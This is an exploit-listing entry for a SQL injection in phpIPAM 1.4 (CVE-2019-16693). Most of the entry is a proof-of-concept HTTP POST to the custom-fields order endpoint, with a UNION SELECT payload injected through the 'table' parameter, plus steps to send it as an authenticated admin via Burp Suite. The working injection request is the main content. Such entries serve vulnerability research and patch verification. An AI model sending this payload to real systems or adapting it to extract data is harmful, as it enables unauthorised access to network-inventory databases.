phpIPAM 1.4 - SQL-Injection



EKU-ID: 56312 CVE: CVE-2019-16693 OSVDB-ID:
Author: CodeSecLab Published: 2025-12-03 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home 


# Exploit Title: phpIPAM 1.4 - SQL Injection
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/phpipam/phpipam/
# Software Link: https://github.com/phpipam/phpipam/
# Version: 1.4
# Tested on: Windows
# CVE : CVE-2019-16693


Proof Of Concept
# Ensure you have a valid user session before executing the PoC.

POST /app/admin/custom-fields/order.php HTTP/1.1
Host: phpipam
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=<valid_session_id>

table=test_table%60+UNION+SELECT+1%2C2%2C3+--+&current=non-empty&next=non-empty&action=add


Steps to Reproduce
1. Login as an admin user.
2. Intercept and send the malicious request using a web proxy tool such as Burp Suite, ensure it includes a valid session cookie.
3. Observe the result